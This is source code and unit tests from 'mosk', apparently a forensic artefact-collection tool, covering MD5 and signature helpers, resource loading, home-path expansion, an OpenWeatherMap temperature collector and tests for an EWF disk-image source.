elif boolstring == '' or boolstring is None:
return False
else:
return True
else:
raise TypeError('Only strings and None are supported.')
# From https://stackoverflow.com/questions/3431825/generating-an-md5-checksum-of-a-file
def md5(fpath: str = "", data: str = ""):
"""
Calculates the the MD5 hash of a file.
You can only provide a file path OR a data string, not both.
:param fpath: Path of the file for which the MD5 hash is required.
:param data: Data string for which the MD5 hash should be calculated.
:return: Returns the string representation of the MD5 hash.
"""
if fpath is not None and fpath != "" and data is not None and data != "":
raise MD5SupportError("You can only provide a file OR a data string to calculate the MD5 hash.")
logger: Logger = logging.getLogger(__name__)
hash_md5 = hashlib.md5()
if fpath is not None and fpath != "":
logger.debug(f"Calculating MD5 hash for '{fpath}'.")
with open(fpath, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
elif data is not None and data != "":
logger.debug(f"Calculating MD5 hash for string '{data}'.")
bvalue = data.encode('ascii')
chunks = _chunkstring(bvalue, 4096)
for chunk in chunks:
hash_md5.update(chunk)
return hash_md5.hexdigest()
def _chunkstring(string: str, length: int):
return (string[0 + i:length + i] for i in range(0, len(string), length))
def get_collector_resources(resourcespath: str = "./resources"):
countrycode, _ = locale.getdefaultlocale()
resources = None
resourcesfilepath = _get_resources_path(resourcespath, countrycode)
resources = _load_resources(resourcesfilepath, countrycode)
if resources is None:
resourcesfilepath = _get_resources_path(resourcespath, 'None')
resources = _load_resources(resourcesfilepath, countrycode)
return resources
class ChangeToModuleRoot:
def __init__(self):
self._original_working_dir = os.getcwd()
def __enter__(self):
self._change_cwd_to_module_root()
def __exit__(self, exc_type, exc_value, exc_traceback):
os.chdir(self._original_working_dir)
@staticmethod
def _change_cwd_to_module_root():
basepath: str = os.path.dirname(sys.modules[__name__].__file__)
os.chdir(basepath)
os.chdir('..')
def _get_resources_path(resourcespath: str, countrycode: str):
logger: Logger = logging.getLogger(__name__)
if resourcespath == '':
raise NoStringResourcesError('Resources path is empty.')
if countrycode == '':
raise NoCountryCodeError('Country code is empty.')
resourcesfilepath = os.path.join(resourcespath, f"collector_text_{countrycode}.json")
logger.debug("Trying to load text resources from '{} ...'".format(resourcesfilepath))
    # Change the working directory to the mosk root so that os.path.abspath
    # resolves relative resource paths correctly. This relies on the support
    # module living one directory level below the root.
with ChangeToModuleRoot():
resourcesfilepath = os.path.abspath(resourcesfilepath)
return resourcesfilepath
def _load_resources(resourcesfilepath: str, countrycode: str):
if resourcesfilepath == '':
raise NoStringResourcesError('Resourcefilepath is empty.')
logger = logging.getLogger(__name__)
resources = None
if os.path.exists(resourcesfilepath):
try:
with open(resourcesfilepath) as rf:
resources = json.load(rf)
except json.decoder.JSONDecodeError as json_error:
if json_error.msg == "Expecting value":
logger.info(f'Resource file for country code {countrycode} is empty.')
except FileNotFoundError:
if countrycode is None:
logger.warning('Default resources file not found.')
else:
logger.info(f'Resources file for country code {countrycode} not found.')
return resources
def run_terminal_command(arguments: list):
process = subprocess.Popen(arguments,
stdout=subprocess.PIPE,
universal_newlines=True)
return process.communicate()[0]
def format_bytes(size: int):
    """
    Calculate a more human-readable representation of a byte size.
    :param size: Supports sizes up to terabytes. Anything larger is still returned as terabytes.
    :return: string <calculatedsize><unit>, for example "1.5KB"
    """
power = 1024
n = 0
max_unit = 4
power_labels = {0: '', 1: 'K', 2: 'M', 3: 'G', 4: 'T'}
while size >= power and n < max_unit:
size /= power
n += 1
return f"{round(size,2)}{power_labels[n]+'B'}"
def validate_file_signature(filepath: str) -> bool:
"""
Takes a file path, calculates its MD5 hash and compares this hash to the provided hash
the file should have.
Expects that in the folder of the file to check also is a file called <file>.md5 which contains
the expected hash.
:param filepath:
:return: Returns True if the hash of the file is the same as the implicitely provided hash.
"""
file_, file_ext = os.path.splitext(filepath)
    signature_file: str = f"{file_}.md5"
if not os.path.exists(signature_file):
return False
    # MD5 hashes are 128 bits long. Roughly check the signature file size:
    # 32 bytes for a hex digest stored in a single-byte encoding (ASCII/UTF-8),
    # or 16 bytes for a raw binary digest.
if os.stat(signature_file).st_size != 32 and os.stat(signature_file).st_size != 16:
return False
with open(signature_file) as sig_file:
signature = sig_file.read()
if md5(filepath) != signature:
return False
return True
```
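A quick sketch of the pure helpers above (no file system or network needed; importing the module assumes its third-party dependencies such as `chardet` are installed):
```python
from businesslogic.support import format_bytes, md5, str_to_bool

print(format_bytes(1536))        # 1.5KB
print(str_to_bool('False'))      # False
print(md5(data='hello'))         # 5d41402abc4b2a76b9719d911017c592
```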
#### File: mosk/source/localhost.py
```python
__author__ = '3Peso'
__all__ = ['LocalHost', 'expandfilepath']
import logging
from baseclasses.source import SourceBase
from os import path
from pathlib import Path
class LocalHost(SourceBase):
def __init__(self, *args, **kwargs):
SourceBase.__init__(self, *args, **kwargs)
def expandfilepath(filepath: str):
if '~' not in filepath:
return filepath
homepath: str = str(Path.home())
filepath = filepath.split('~')[-1]
if filepath.startswith('/'):
filepath: str = filepath[1:]
filepath = path.join(homepath, filepath)
logger = logging.getLogger(__name__)
logger.debug("Path '{}' expanded.".format(filepath))
return filepath
```
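A small sketch of the path expansion (assuming the mosk `source` package is importable; the exact output depends on the current user's home directory):
```python
from source.localhost import expandfilepath

print(expandfilepath('~/Documents/report.txt'))
# e.g. /Users/testuser/Documents/report.txt
print(expandfilepath('/tmp/absolute.txt'))   # returned unchanged, no '~' present
```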
#### File: mosk/tests/test_artefact.py
```python
import logging
import platform
from unittest import TestCase, mock
from unittest.mock import MagicMock, patch
class TestArtefactBaseDataSetter(TestCase):
@mock.patch('businesslogic.placeholders.Placeholder._initialize_global_placeholders', MagicMock())
def test_data_setter(self):
"""
Should add the provided value as data object to its data object list
:return:
"""
from baseclasses.artefact import ArtefactBase
artefact = ArtefactBase(parent=None, parameters={})
artefact.data = "Some data"
self.assertEqual(len(artefact.data), 1)
@mock.patch('businesslogic.placeholders.Placeholder._initialize_global_placeholders', MagicMock())
def test_data_setter_with_two_objects(self):
"""
Should append data to the data object array if there are more data objects to be collected
:return:
"""
from baseclasses.artefact import ArtefactBase
artefact = ArtefactBase(parent=None, parameters={})
artefact.data = "Some data"
artefact.data = "More data"
self.assertEqual(len(artefact.data), 2)
@mock.patch('businesslogic.placeholders.Placeholder._initialize_global_placeholders', MagicMock())
def test_data_setter_overwrite(self):
"""
Should overwrite existing collected data if None is provided as data object
:return:
"""
from baseclasses.artefact import ArtefactBase
artefact = ArtefactBase(parent=None, parameters={})
artefact.data = "Some data"
artefact.data = "More data"
artefact.data = None
self.assertEqual(len(artefact.data), 0)
class TestArtefactBaseInitDescription(TestCase):
@mock.patch('businesslogic.placeholders.Placeholder._initialize_global_placeholders', MagicMock())
def test__init_description_properties_with_missing_resources(self):
"""
Should initialize properties _title, _description, and _collectionmethod with None
"""
from baseclasses.artefact import ArtefactBase
artefact = ArtefactBase(parent=None, parameters={})
self.assertIsNone(artefact._title)
self.assertIsNone(artefact._description)
self.assertIsNone(artefact._collectionmethod)
@mock.patch('businesslogic.placeholders.Placeholder._initialize_global_placeholders', MagicMock())
def test__init_description_properties_with_missing_resources_for_collector(self):
"""
Should initialize properties _title, _description, and _collectionmethod with None,
if there are no string for the current collector
"""
from baseclasses.artefact import ArtefactBase
artefact = ArtefactBase(parent=None, parameters={})
self.assertIsNone(artefact._title)
self.assertIsNone(artefact._description)
self.assertIsNone(artefact._collectionmethod)
@mock.patch('businesslogic.placeholders.Placeholder._initialize_global_placeholders', MagicMock())
def test__init_description_properties(self):
"""
Should initialize properties _title, _description, and _collectionmethod
"""
from tests.support.mockups import SimpleArtefactMockup
artefact = SimpleArtefactMockup(parent=None, parameters={})
self.assertEqual(artefact._title, 'SimpleArtefactMockup')
self.assertEqual(artefact._description, 'This is a mockup collector.')
self.assertEqual(artefact._collectionmethod, 'mockup')
class TestArtefactBaseCacheParameters(TestCase):
def test_cache_parameters_not_defined(self):
"""
Should add the new placeholder to the global placeholders dictionary of Placeholders.
"""
from baseclasses.artefact import ArtefactBase
from businesslogic.placeholders import Placeholder
artefact = ArtefactBase(parent=None, parameters={})
expected_value = "value"
expected_attribute = "attribute"
artefact.cache_parameters({expected_attribute: expected_value})
try:
actual_value = Placeholder._instruction_placeholders[expected_attribute]
self.assertEqual(expected_value, actual_value)
except Exception:
self.fail()
def test_cache_parameters_already_defined(self):
"""
Should overwrite the placeholder in the global placeholders dictionary of Placeholders.
"""
from baseclasses.artefact import ArtefactBase
from businesslogic.placeholders import Placeholder
artefact = ArtefactBase(parent=None, parameters={})
expected_value = "value"
expected_attribute = "attribute"
Placeholder._instruction_placeholders[expected_attribute] = expected_value
expected_new_value = "new value"
artefact.cache_parameters({expected_attribute: expected_new_value})
try:
actual_value = Placeholder._instruction_placeholders[expected_attribute]
self.assertEqual(expected_new_value, actual_value)
except Exception:
self.fail()
class TestArtefactBaseDunderCall(TestCase):
def test___call__with_unhandled_exception(self):
"""
        Should log a meaningful error message in the collected data.
:return:
"""
from tests.support.mockups import ExceptionArtefactMockup
expected_message = "Caught unhandled exception during collection of artefact. " \
"Exception: There is something wrong with your values."
actual_artefact = ExceptionArtefactMockup(parent=None, parameters={})
actual_artefact._supportedplatform = []
try:
logging.disable(logging.ERROR)
# Collect by using __call__
actual_artefact()
finally:
logging.disable(logging.NOTSET)
actual_message = actual_artefact.data[0].collecteddata
self.assertEqual(actual_message, expected_message)
def test___call__with_unsupported_platform(self):
"""
        Should log that the selected collector is not supported by the underlying platform.
:return:
"""
from tests.support.mockups import ExceptionArtefactMockup
expected_message = 'The platform "{}" is not supported by this collector. ' \
'\r\nPlatform supported: "[\'MamboJamboPlatform\']"'.format(platform.system())
actual_artefact = ExceptionArtefactMockup(parent=None, parameters={})
# Collect by using __call__
actual_artefact()
actual_message = actual_artefact.data[0].collecteddata
self.assertEqual(actual_message, expected_message)
def test___call__with_unsupported_platform_version(self):
"""
        Should log in data that the platform version is not supported.
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_min_version = "1.0.0.0"
expected_max_version = "2.0.0.0"
expected_platform_version = "0.9.0.0"
expected_message = 'The platform "{}" with its version "{}" is not supported by this collector. ' \
'\r\nMinimal version supported: "{}". Max version supported: "{}"' \
.format(platform.system(), expected_platform_version, expected_min_version, expected_max_version)
actual_artefact = SimpleArtefactMockup(parent=None, parameters={})
actual_artefact._platform_version = expected_platform_version
actual_artefact._min_platform_version = expected_min_version
actual_artefact._max_platform_version = expected_max_version
# Collect by using __call__
with mock.patch('baseclasses.artefact.ArtefactBase.is_platform_version_supported',
MagicMock(return_value=False)):
actual_artefact()
actual_message = actual_artefact.data[0].collecteddata
self.assertEqual(actual_message, expected_message)
class TestArtefactBaseDunderStr(TestCase):
def test___str__data_is_none(self):
"""
Should return empty string.
:return:
"""
from tests.support.mockups import ExceptionArtefactMockup
expected_string = ''
actual_artefact = ExceptionArtefactMockup(parent=None, parameters={})
actual_artefact_as_string = str(actual_artefact)
self.assertEqual(expected_string, actual_artefact_as_string)
class TestArtefactBaseGetDocumentation(TestCase):
def test_getdocumentation(self):
"""
Should return string with the documentation information for that collector.
:return:
"""
from tests.support.mockups import ExceptionArtefactMockup
expected_documentation = 'Title: Title\nDescription: Description\nCollection Method: Method'
actual_artefact = ExceptionArtefactMockup(parent=None, parameters={})
actual_artefact._title = "Title"
actual_artefact._description = "Description"
actual_artefact._collectionmethod = "Method"
actual_documentation = actual_artefact.getdocumentation()
self.assertEqual(actual_documentation, expected_documentation)
class TestArtefactBaseInitDescriptionProperties(TestCase):
def test__init_description_properties(self):
"""
        Should initialize _title, _description, and _collectionmethod by looking this information up
        in the resources file currently in use.
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_resources = {
'tests.support.mockups.SimpleArtefactMockup': {
'title': 'Test Title',
'description': 'Test Description',
'collectionmethod': 'Method'
}
}
with mock.patch('baseclasses.artefact.get_collector_resources',
MagicMock(return_value=expected_resources)):
actual_artefact = SimpleArtefactMockup(parameters={}, parent={})
actual_artefact._init_description_properties()
self.assertEqual(expected_resources['tests.support.mockups.SimpleArtefactMockup']['title'],
actual_artefact._title)
self.assertEqual(expected_resources['tests.support.mockups.SimpleArtefactMockup']['description'],
actual_artefact._description)
self.assertEqual(expected_resources['tests.support.mockups.SimpleArtefactMockup']['collectionmethod'],
actual_artefact._collectionmethod)
def test__init_description_properties_no_title_found(self):
"""
Should init _title with "No title found".
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_resources = {
'tests.support.mockups.SimpleArtefactMockup': {
'description': 'Test Description',
'collectionmethod': 'Method'
}
}
with mock.patch('baseclasses.artefact.get_collector_resources',
MagicMock(return_value=expected_resources)):
actual_artefact = SimpleArtefactMockup(parameters={}, parent={})
actual_artefact._init_description_properties()
self.assertEqual("No Title Found", actual_artefact._title)
def test__init_description_properties_no_description_found(self):
"""
Should init _description with "No description found".
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_resources = {
'tests.support.mockups.SimpleArtefactMockup': {
'title': 'Title',
'collectionmethod': 'Method'
}
}
with mock.patch('baseclasses.artefact.get_collector_resources',
MagicMock(return_value=expected_resources)):
actual_artefact = SimpleArtefactMockup(parameters={}, parent={})
actual_artefact._init_description_properties()
self.assertEqual("No Description Found", actual_artefact._description)
def test__init_description_properties_no_colletionmethod_found(self):
"""
Should init _collectionmethod with "No collection method found".
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_resources = {
'tests.support.mockups.SimpleArtefactMockup': {
'title': 'Title',
'description': 'Description'
}
}
with mock.patch('baseclasses.artefact.get_collector_resources',
MagicMock(return_value=expected_resources)):
actual_artefact = SimpleArtefactMockup(parameters={}, parent={})
actual_artefact._init_description_properties()
self.assertEqual("No Collection Method Found", actual_artefact._collectionmethod)
class TestArtefactBaseSupportedPlatform(TestCase):
def test_supported_platform_set_multiple_platforms(self):
"""
Should add all platforms to the member list _supportedplatform
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_platforms = "['Platform1', 'Platform2', 'Platform3']"
collector = SimpleArtefactMockup(parameters={}, parent=None)
collector.supported_platform = "Platform1"
collector.supported_platform = "Platform2"
collector.supported_platform = "Platform3"
self.assertEqual(expected_platforms, str(collector._supportedplatform))
def test_supported_platform_set_same_platform_twice(self):
"""
Should add a supported platform just once.
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_platforms = "['Platform1', 'Platform2']"
collector = SimpleArtefactMockup(parameters={}, parent=None)
collector.supported_platform = "Platform1"
collector.supported_platform = "Platform2"
collector.supported_platform = "Platform2"
self.assertEqual(expected_platforms, str(collector._supportedplatform))
def test_supported_platform_getter(self):
"""
Should return the memberlist _supportedplatform
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_platforms = "['Platform1', 'Platform2', 'Platform3']"
collector = SimpleArtefactMockup(parameters={}, parent=None)
collector.supported_platform = "Platform1"
collector.supported_platform = "Platform2"
collector.supported_platform = "Platform3"
actual_platforms = collector.supported_platform
self.assertEqual(expected_platforms, str(actual_platforms))
class TestArtefactBase(TestCase):
def test_is_platform_supported_with_multiple_supported_platforms(self):
"""
Should return true
:return:
"""
from tests.support.mockups import SimpleArtefactMockup
expected_support = True
collector = SimpleArtefactMockup(parameters={}, parent=None)
collector.supported_platform = "Platform1"
collector.supported_platform = "Platform2"
collector.supported_platform = "Platform3"
with mock.patch('baseclasses.artefact.platform.system', MagicMock(return_value='Platform1')):
actual_support = collector.is_platform_supported()
self.assertEqual(expected_support, actual_support)
class TestFileClassFilePathProperty(TestCase):
def test_filepath_setter_with_trailing_whitespace_chars(self):
"""
Should remove whitespace chars like '\r' and '\n'
:return:
"""
from baseclasses.artefact import FileClass
expected_file_path = "./somepath"
fileobj = FileClass()
fileobj.source_path = './somepath\r\n'
actual_file_path = fileobj.source_path
self.assertEqual(expected_file_path, actual_file_path)
def test_filepath_setter_with_home_abbreviation(self):
"""
Should expand the file path.
:return:
"""
from baseclasses.artefact import FileClass
expected_file_path = "/home/testuser/somepath"
fileobj = FileClass()
with mock.patch('baseclasses.artefact.expandfilepath', MagicMock(return_value=expected_file_path)):
fileobj.source_path = '~/somepath'
actual_file_path = fileobj.source_path
self.assertEqual(expected_file_path, actual_file_path)
    def test_filepath_setter(self):
"""
Should set the value of _filepath
:return:
"""
from baseclasses.artefact import FileClass
expected_file_path = "./somepath"
fileobj = FileClass()
fileobj.source_path = './somepath'
actual_file_path = fileobj._source_path
self.assertEqual(expected_file_path, actual_file_path)
def test_filepath_getter(self):
"""
Should return the value of _filepath
:return:
"""
from baseclasses.artefact import FileClass
expected_file_path = "./somepath"
fileobj = FileClass()
fileobj._source_path = './somepath'
actual_file_path = fileobj.source_path
self.assertEqual(expected_file_path, actual_file_path)
class TestToolClassToolPathGetter(TestCase):
def test_tool_path_with_empty__tool_path(self):
"""
Should return 'plutil' indicating that the live plutil is used.
:return:
"""
from baseclasses.artefact import ToolClass
expected_tool_path = "plutil"
tool = ToolClass()
tool._default_tool = "plutil"
actual_tool_path = tool.tool_path
self.assertEqual(expected_tool_path, actual_tool_path)
class TestToolClassToolPathSetter(TestCase):
@patch('artefact.localhost.tools.path.exists', MagicMock(return_value=True))
def test_tool_path_existing_path(self):
"""
Should return tool path.
"""
from baseclasses.artefact import ToolClass
tool = ToolClass()
tool._default_tool = "plutil"
with patch('baseclasses.artefact.validate_file_signature', MagicMock(return_value=True)):
expected_tool_path = "some_tool_path"
tool.tool_path = expected_tool_path
actual_tool_path = tool._tool_path
self.assertEqual(expected_tool_path, actual_tool_path)
def test_tool_path_is_empty(self):
"""
Should set _tool_path to empty string.
:return:
"""
from baseclasses.artefact import ToolClass
expected_tool_path = ""
tool = ToolClass()
tool._default_path = "plutil"
tool.tool_path = ""
actual_tool_path = tool._tool_path
self.assertEqual(expected_tool_path, actual_tool_path)
@patch('artefact.localhost.tools.path.exists', MagicMock(return_value=True))
    def test_tool_path_existing_path_but_wrong_signature(self):
"""
Should throw an exception.
:return:
"""
from baseclasses.artefact import ToolClass
from businesslogic.errors import SignatureMatchError
tool = ToolClass()
tool._default_tool = "plutil"
with patch('baseclasses.artefact.validate_file_signature', MagicMock(return_value=False)):
expected_util_path = 'some_tool_path'
with self.assertRaises(SignatureMatchError):
tool.tool_path = expected_util_path
def test_tool_path_does_not_exist(self):
"""
Should not set the attribute _tool_path
:return:
"""
from baseclasses.artefact import ToolClass
expected_tool_path = ""
tool = ToolClass()
tool._default_path = "plutil"
tool.tool_path = "IDoNotExist"
actual_tool_path = tool._tool_path
self.assertEqual(expected_tool_path, actual_tool_path)
```
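These test cases follow the standard `unittest` layout; a sketch of running one of them programmatically, assuming the repository root is on `sys.path`:
```python
import unittest
from tests.test_artefact import TestArtefactBaseDataSetter

suite = unittest.defaultTestLoader.loadTestsFromTestCase(TestArtefactBaseDataSetter)
unittest.TextTestRunner(verbosity=2).run(suite)
```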
#### File: mosk/tests/test_collector_network_internet.py
```python
import logging
import platform
from unittest import TestCase, mock
from unittest.mock import MagicMock
from artefact.network.internet import TemperatureFromOpenWeatherDotCom
class TestTemperatureFromOpenWeatherDotComDunderInit(TestCase):
def test___init__(self):
"""
Should initialize self.__url and self.__querytemplate.
:return:
"""
expected_querytemplate = "{}?q={},{}&units=Metric&&APPID={}"
expected_url = "https://api.openweathermap.org/data/2.5/weather"
collector = TemperatureFromOpenWeatherDotCom(parameters={}, parent=None)
self.assertEqual(expected_url, collector._TemperatureFromOpenWeatherDotCom__url)
self.assertEqual(expected_querytemplate, collector._TemperatureFromOpenWeatherDotCom__querytemplate)
class TestTemperatureFromOpenWeatherDotComCollect(TestCase):
@mock.patch('artefact.network.internet.TemperatureFromOpenWeatherDotCom._get_query',
MagicMock(return_value='http://plumbumm.ich.bin.nicht.da.haha'))
def test__collect_openweathermap_not_reachable(self):
"""
Should log unreachability in the "collected" data as string.
:return:
"""
excpeted_data = "Could not query http://plumbumm.ich.bin.nicht.da.haha." \
"\n<urlopen error [Errno 8] nodename nor servname provided, or not known>"
if platform.system() == "Windows":
excpeted_data = "Could not query http://plumbumm.ich.bin.nicht.da.haha." \
"\n<urlopen error [Errno 11001] getaddrinfo failed>"
collector = TemperatureFromOpenWeatherDotCom(parameters={
'countrycode': 'ger', 'apikey': '<KEY>', 'city': 'Munich'}, parent=None)
collector._collect()
self.assertEqual(excpeted_data, collector.data[0].collecteddata)
@mock.patch('artefact.network.internet.urlopen',
MagicMock(return_value='I am invalid'))
@mock.patch('artefact.network.internet.TemperatureFromOpenWeatherDotCom._weather_data_is_valid',
MagicMock(return_value=False))
def test__collect_openweathermap_returns_invalid_json(self):
"""
Should log invalid state of json in "collected" data as string.
:return:
"""
        expected_data = \
            "'https://api.openweathermap.org/data/2.5/weather?q=Munich,ger" \
            "&units=Metric&&APPID=123456789abcdefghijkl1234567890a' " \
            "returned invalid weather data."
        collector = TemperatureFromOpenWeatherDotCom(parameters={
            'countrycode': 'ger', 'apikey': '<KEY>', 'city': 'Munich'}, parent=None)
        collector._apikey = '<KEY>'
        collector._collect()
        self.assertEqual(expected_data, collector.data[0].collecteddata)
def test__collect_missing_query_parameter(self):
"""
Should log the missing parameter(s) in data.
:return:
"""
excpeted_data = "Could not load query. " \
"Error: ''TemperatureFromOpenWeatherDotCom' object has no attribute 'city''."
collector = TemperatureFromOpenWeatherDotCom(parameters={
'countrycode': 'ger', 'apikey': '<KEY>'}, parent=None)
collector._collect()
self.assertEqual(excpeted_data, collector.data[0].collecteddata)
class TestTemperatureFromOpenWeatherDotComGetParametersForStr(TestCase):
def test__get_parameters_for_str(self):
"""
Should get all parameters necessary and store them for logging except the API key.
:return:
"""
collector = TemperatureFromOpenWeatherDotCom(parameters={'city': 'Munich',
'countrycode': 'ger', 'apikey': '<KEY>'}, parent=None)
actual_parameters = collector._get_parameters_for_str()
self.assertFalse('apikey' in actual_parameters)
class TestTemperatureFromOpenWeatherDotComGetQuery(TestCase):
def test__get_query(self):
"""
        Should return the initialized query string used to query the weather from openweathermap.org
:return:
"""
expected_query = "https://api.openweathermap.org/data/2.5/weather?q=Munich,ger&units=Metric&&APPID=123456789abcdefghijkl1234567890a"
collector = TemperatureFromOpenWeatherDotCom(parameters={
'city': 'Munich', 'countrycode': 'ger', 'apikey': '<KEY>'}, parent=None)
collector._apikey = '<KEY>'
actual_query = collector._get_query()
self.assertEqual(expected_query, actual_query)
def test__get_query_missing_city(self):
"""
Should raise an exception.
:return:
"""
collector = TemperatureFromOpenWeatherDotCom(parameters={'countrycode': 'ger', 'apikey':
'<KEY>'},
parent=None)
self.assertRaises(AttributeError, collector._get_query)
def test__get_query_missing_countrycode(self):
"""
Should raise an exception.
:return:
"""
collector = TemperatureFromOpenWeatherDotCom(parameters={'city': 'Munich', 'apikey':
'<KEY>'},
parent=None)
self.assertRaises(AttributeError, collector._get_query)
def test__get_query_missing_apikey(self):
"""
Should raise an exception.
:return:
"""
from businesslogic.errors import ApiKeyNotSetError
collector = TemperatureFromOpenWeatherDotCom(parameters={'city': 'Munich', 'countrycode': 'ger'},
parent=None)
self.assertRaises(ApiKeyNotSetError, collector._get_query)
class TestTemperatureFromOpenWeatherDotComWeatherDataIsValid(TestCase):
def test__weather_data_is_valid(self):
"""
Should return True
:return:
"""
collector = TemperatureFromOpenWeatherDotCom(parameters={
'countrycode': 'ger', 'apikey': '<KEY>', 'city': 'Munich'}, parent=None)
class FunkyHTTPResponseMockup():
@staticmethod
def getcode():
return 200
actual_data = FunkyHTTPResponseMockup()
actual_result = collector._weather_data_is_valid(actual_data)
self.assertTrue(actual_result)
    def test__weather_data_is_valid_data_is_invalid(self):
"""
Should return False
:return:
"""
collector = TemperatureFromOpenWeatherDotCom(parameters={
'countrycode': 'ger', 'apikey': '<KEY>', 'city': 'Munich'}, parent=None)
class FunkyHTTPResponseMockup():
@staticmethod
def getcode():
return 401
actual_data = FunkyHTTPResponseMockup()
try:
logging.disable(logging.ERROR)
actual_result = collector._weather_data_is_valid(actual_data)
finally:
logging.disable(logging.NOTSET)
self.assertFalse(actual_result)
class TestTemperatureFromOpenWeatherDotComApiKey(TestCase):
def test_apikey_getter_not_initialized(self):
"""
Should raise an exception.
:return:
"""
from businesslogic.errors import ApiKeyNotSetError
collector = TemperatureFromOpenWeatherDotCom(parent=None, parameters={})
with self.assertRaises(ApiKeyNotSetError):
tmp = collector.apikey
def test_apikey_getter(self):
"""
Should return the value of _apikey
:return:
"""
expected_apikey = "12345"
collector = TemperatureFromOpenWeatherDotCom(parent=None, parameters={})
collector._apikey = "12345"
actual_apikey = collector.apikey
self.assertEqual(expected_apikey, actual_apikey)
def test_apikey_setter_invalid_format(self):
"""
Should raise an error.
:return:
"""
from businesslogic.errors import ApiKeyFormatError
collector = TemperatureFromOpenWeatherDotCom(parent=None, parameters={})
with self.assertRaises(ApiKeyFormatError):
collector.apikey = '12345'
def test_apikey_setter(self):
"""
Should set the value of _apikey
:return:
"""
expected_key = '<KEY>'
collector = TemperatureFromOpenWeatherDotCom(parent=None, parameters={})
collector.apikey = expected_key
self.assertEqual(expected_key, collector._apikey)
```
#### File: mosk/tests/test_ewfimage.py
```python
import platform
import unittest
from unittest import TestCase
from unittest.mock import patch, MagicMock
class TestEWFImageDunderInit(TestCase):
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test___init__image_info(self):
"""
        Should initialize member _imageinfo with an EWFImageInfo object.
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
self.assertEqual(expected_image_info, actual_ewf_image._imageinfo)
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test___init__initialize_partition_lookup(self):
"""
Should call _initialize_partition_lookup
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
init_mock = MagicMock(return_value=None)
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
with patch('source.ewfimage.EWFImage._initialize_partition_lookup', init_mock):
EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
init_mock.assert_called_once()
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test___init__filesysteminfo(self):
"""
Should initialize member _filesysteminfo as empty dict.
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_filesysteminfo: dict = {}
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
self.assertEqual(expected_filesysteminfo, actual_ewf_image._filesysteminfo)
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=False))
def test___init__fs_discovered(self):
"""
Should initialize member _fs_discoverd with False
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_fs_discovered: bool = False
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': False})
self.assertEqual(expected_fs_discovered, actual_ewf_image._fs_discoverd)
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
@patch('source.ewfimage.EWFImage._initialize_partition_lookup', MagicMock(return_value=None))
@patch('businesslogic.placeholders.Placeholder.replace_placeholders', MagicMock(return_value='test.e01'))
@patch('source.ewfimage.str_to_bool', MagicMock(return_value=True))
def test___init__discover_parameter_true(self):
"""
Should initialize member _fs_discoverd with True and call _initialize_partitions.
:return:
"""
import pyewf
from source.ewfimage import EWFImage, EWFImageInfo
expected_fs_discovered: bool = True
expected_image_info: EWFImageInfo = EWFImageInfo(ewf_handle=pyewf.handle())
init_mock = MagicMock(return_value=None)
with patch('source.ewfimage.EWFImage._get_image_information', MagicMock(return_value=expected_image_info)):
with patch('source.ewfimage.EWFImage._initialize_partitions', init_mock):
                actual_ewf_image = EWFImage(parent=None, parameters={'filepath': 'test.e01', 'discover': True})
self.assertEqual(expected_fs_discovered, actual_ewf_image._fs_discoverd)
init_mock.assert_called_once()
@unittest.skipIf(platform.system() == "Windows", "Platform currently not supported.")
@patch('source.ewfimage.os.path.exists', MagicMock(return_value=True))
